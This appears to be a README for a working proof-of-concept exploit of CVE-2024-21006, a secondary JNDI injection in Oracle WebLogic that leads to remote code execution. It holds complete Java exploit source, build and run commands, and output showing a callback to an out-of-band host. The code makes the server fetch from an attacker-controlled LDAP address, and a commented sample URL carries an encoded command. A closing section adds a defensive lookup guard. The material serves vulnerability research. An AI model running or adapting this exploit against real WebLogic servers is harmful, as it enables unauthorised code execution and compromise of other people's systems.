# WebLogic - CVE-2024-21006

CVE-2024-21006 reveals a new WebLogic attack method, secondary JNDI injection: a JNDI injection is triggered while an earlier JNDI injection is being processed, which leads to **RCE**.

This project is based on the findings of [pwnull](https://pwnull.github.io/2024/oracle%20weblogic%20CVE-2024-21006%20Double-JNDInjection%20RCE%20analyze/) and code from [momika233](https://github.com/momika233/CVE-2024-21006).

## Proof-of-Concept

### Oracle 14.1.1.0

```bash
apt :: ~ » docker container ls
CONTAINER ID   IMAGE                                                        COMMAND                  CREATED        STATUS       PORTS                                                                                  NAMES
fa9822b7dfd5   container-registry.oracle.com/middleware/weblogic:14.1.1.0   "/u01/oracle/createA…"   23 hours ago   Up 2 hours   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp   14110-weblogic
```

Prepare the environment by uploading `MainClass.java` and `META-INF/MANIFEST.MF` to the WebLogic container.

```bash
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MainClass.java
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MANIFEST.MF
[oracle@14110-weblogic lib]$ mkdir META-INF
[oracle@14110-weblogic lib]$ mv MANIFEST.MF META-INF/
```

Compile the code and package it into a runnable JAR.

```bash
[oracle@14110-weblogic lib]$ javac -cp /u01/oracle/wlserver/server/lib/weblogic.jar MainClass.java
[oracle@14110-weblogic lib]$ ls -al | grep MainClass
-rw-rw-r-- 1 oracle oracle    2033 Oct 10 08:03 MainClass$1.class
-rw-rw-r-- 1 oracle oracle    1386 Oct 10 08:03 MainClass.class
-rw-rw-r-- 1 oracle oracle    3717 Oct 10 08:01 MainClass.java

[oracle@14110-weblogic lib]$ jar cvfm cve-2024-21006.jar META-INF/MANIFEST.MF *.class
added manifest
adding: MainClass$1.class(in = 2033) (out= 671)(deflated 66%)
adding: MainClass.class(in = 2161) (out= 1100)(deflated 49%)
```

```bash
[oracle@14110-weblogic lib]$ java -jar cve-2024-21006.jar
Target IP: 127.0.0.1
Target Port: 7001
RMI Address (ip:port/exp): wssm1qvzn5i56ehqjskcwdmtckib639ry.oastify.com
```

*Figure: Burp Collaborator callback indicating a successful exploit attempt.*

## Source code

```java
// MainClass.java
import weblogic.j2ee.descriptor.InjectionTargetBean;
import weblogic.j2ee.descriptor.MessageDestinationRefBean;
import javax.naming.*;
import java.util.Scanner;
import java.util.Hashtable;
import java.util.Random;

public class MainClass {

    public static void main(String[] args) throws Exception {
        // Read the target and the callback address interactively.
        Scanner scanner = new Scanner(System.in);
        System.out.print("Target IP: ");
        String ip = scanner.nextLine();
        System.out.print("Target Port: ");
        String port = scanner.nextLine();
        // Despite the prompt text, this value is used as an LDAP URL: "ldap://" is prepended below.
        System.out.print("RMI Address (ip:port/exp): ");
        String rmiexp = scanner.nextLine();
        // Random suffix so that repeated runs do not collide on the bound name.
        Random bindname = new Random();
        int bindint = bindname.nextInt(10000);
//        String ip = "127.0.0.1";
//        String port = "7001";
//        String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ==";
        // The JNDI provider is reached over IIOP on the WebLogic listen port.
        String rhost = String.format("iiop://%s:%s", ip, port);
        Hashtable<String, String> env = new Hashtable<String, String>();
        // wlserver/server/lib/weblogic.jar must be on the classpath, otherwise this fails.
        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
        env.put(Context.PROVIDER_URL, rhost);
        Context context = new InitialContext(env);
//        Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory","");
        weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() {
            @Override
            public String[] getDescriptions() {
                return new String[0];
            }

            @Override
            public void addDescription(String s) {

            }

            @Override
            public void removeDescription(String s) {

            }

            @Override
            public void setDescriptions(String[] strings) {

            }

            @Override
            public String getMessageDestinationRefName() {
                return null;
            }

            @Override
            public void setMessageDestinationRefName(String s) {

            }

            @Override
            public String getMessageDestinationType() {
                return "weblogic.application.naming.MessageDestinationReference";
            }

            @Override
            public void setMessageDestinationType(String s) {

            }

            @Override
            public String getMessageDestinationUsage() {
                return null;
            }

            @Override
            public void setMessageDestinationUsage(String s) {

            }

            @Override
            public String getMessageDestinationLink() {
                return null;
            }

            @Override
            public void setMessageDestinationLink(String s) {

            }

            @Override
            public String getMappedName() {
                return null;
            }

            @Override
            public void setMappedName(String s) {

            }

            @Override
            public InjectionTargetBean[] getInjectionTargets() {
                return new InjectionTargetBean[0];
            }

            @Override
            public InjectionTargetBean createInjectionTarget() {
                return null;
            }

            @Override
            public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {

            }

            @Override
            public String getLookupName() {
                return null;
            }

            @Override
            public void setLookupName(String s) {

            }

            @Override
            public String getId() {
                return null;
            }

            @Override
            public void setId(String s) {

            }
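        }, "ldap://" + rmiexp, null, null);

        // Bind the reference under a random name, then look it up so that it is resolved.
        // Per the description above, resolving it triggers the second JNDI lookup of the ldap:// URL.
        context.bind("pthree" + bindint, messageDestinationReference);
        context.lookup("pthree" + bindint);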
    }
}
```

`META-INF/MANIFEST.MF`:

```text
Manifest-Version: 1.0
Main-Class: MainClass
Class-Path: /u01/oracle/wlserver/server/lib/weblogic.jar
```
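
The PoC binds a reference whose name is an `ldap://` URL, and the second injection happens when that name is later passed to a JNDI lookup. As an added example (not part of the PoC, of the cited write-ups, or of Oracle's fix), the guard below rejects names carrying a remote URL scheme before they reach `Context.lookup()`; the class name, the `java:`-only allowlist and the sample names are assumptions made for illustration.

```java
import javax.naming.Context;
import javax.naming.NamingException;
import java.util.Collections;
import java.util.Locale;
import java.util.Set;

// Added example (not from the PoC or from WebLogic): refuse JNDI names that
// carry a URL scheme before they are handed to Context.lookup().
public class GuardedJndiLookup {

    // Assumption: only local "java:" names are legitimate for this application.
    private static final Set<String> ALLOWED_SCHEMES = Collections.singleton("java");

    // A name has a URL scheme when a ':' appears before the first '/'.
    // InitialContext uses this rule to route a lookup to a URL context
    // (ldap:, rmi:, iiop:, ...) instead of the local naming tree.
    static String urlScheme(String name) {
        int colon = name.indexOf(':');
        int slash = name.indexOf('/');
        if (colon > 0 && (slash == -1 || colon < slash)) {
            return name.substring(0, colon).toLowerCase(Locale.ROOT);
        }
        return null;
    }

    static boolean isAllowed(String name) {
        if (name == null || name.isEmpty()) {
            return false;
        }
        String scheme = urlScheme(name);
        return scheme == null || ALLOWED_SCHEMES.contains(scheme);
    }

    // Drop-in wrapper: validate first, then delegate to the real context.
    static Object lookup(Context ctx, String name) throws NamingException {
        if (!isAllowed(name)) {
            throw new NamingException("refusing JNDI name with remote scheme: " + name);
        }
        return ctx.lookup(name);
    }

    public static void main(String[] args) {
        // Constructed sample names; no lookup is performed here.
        String[] samples = {
            "jms/OrdersQueue", "java:comp/env/jms/OrdersQueue",
            "ldap://collector.example/obj", "LDAP://collector.example/obj",
            "rmi://collector.example:1099/obj", "iiop://collector.example:7001"
        };
        for (String s : samples) {
            System.out.printf("%-36s %s%n", s, isAllowed(s) ? "allow" : "reject");
        }
    }
}
```

The scheme is lower-cased before the comparison so that `LDAP://` is rejected in the same way as `ldap://`.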

